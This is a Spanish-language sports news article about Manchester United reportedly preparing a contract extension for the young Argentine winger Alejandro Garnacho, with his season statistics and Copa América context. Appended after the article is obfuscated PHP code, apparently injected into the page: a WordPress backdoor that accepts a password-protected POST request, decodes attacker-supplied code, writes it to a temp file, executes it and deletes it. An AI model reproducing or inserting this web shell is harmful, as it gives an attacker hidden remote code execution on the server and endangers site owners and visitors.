Apuesta millonaria por Garnacho

Según ‘Daily Mail’ el argentino podría ampliar su compromiso con el Manchester United. En 2023 firmó su primer contrato profesional hasta 2028.

MANCHESTER, ENGLAND – MAY 12: Alejandro Gernacho of Manchester United looks on during the Premier League match between Manchester United and Arsenal FC at Old Trafford on May 12, 2024 in Manchester, England. (Photo by Michael Regan/Getty Images)

Se prevén aires de cambio en el Manchester United. En lo que parece un futuro hasta cierto punto incierto dentro de los Red Devils, en el club también quieren generar los cimientos para los próximos años. Entre las ideas que sobrevuelan por encima de la directiva mancuniana está el encaminar un nuevo contrato para Alejandro Garnacho.

El extremo argentino, que está entre los nombres de Lionel Scaloni para disputar la Copa América, estaría cerca de ampliar su estancia en Mánchester, según ha informado el medio inglés Daily Mail. El joven atacante, que firmó su primer contrato como profesional en abril de 2023 hasta el año 2028, daría un paso más dentro del equipo en cuanto a importancia.

Garnacho ha sido uno de los jugadores del Manchester United que más partidos ha disputado a lo largo de la temporada (49 en total, igualado con Diogo Dalot). A pesar de iniciar el curso de una manera un tanto difusa, y sin asegurarse el puesto como titular, en 2024 ha sido un fijo para Erik ten Hag y se ha convertido en uno de los pupilos que más fiabilidad han otorgado al técnico neerlandés.

El estado de forma de Marcus Rashford en esta campaña también ha ofrecido al hispano-argentino un contexto idóneo para convertirse en uno de los focos dentro del club. Con 19 años – cumplirá 20 en julio – no ha sucumbido al peso de jugar en la banda izquierda de los Red Devils… Sumando nueve goles y cinco asistencias entre todas las competiciones de la 2023/24.

Su papel con Argentina en Estados Unidos también podría acelerar todo este proceso de extender su estancia en Inglaterra, algo en lo que podría haber un aumento de sueldo y otros valores por parte del Manchester United. Aún con todas las aristas, la postura del club parece clara y tomar a Garnacho como una de las bases también.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}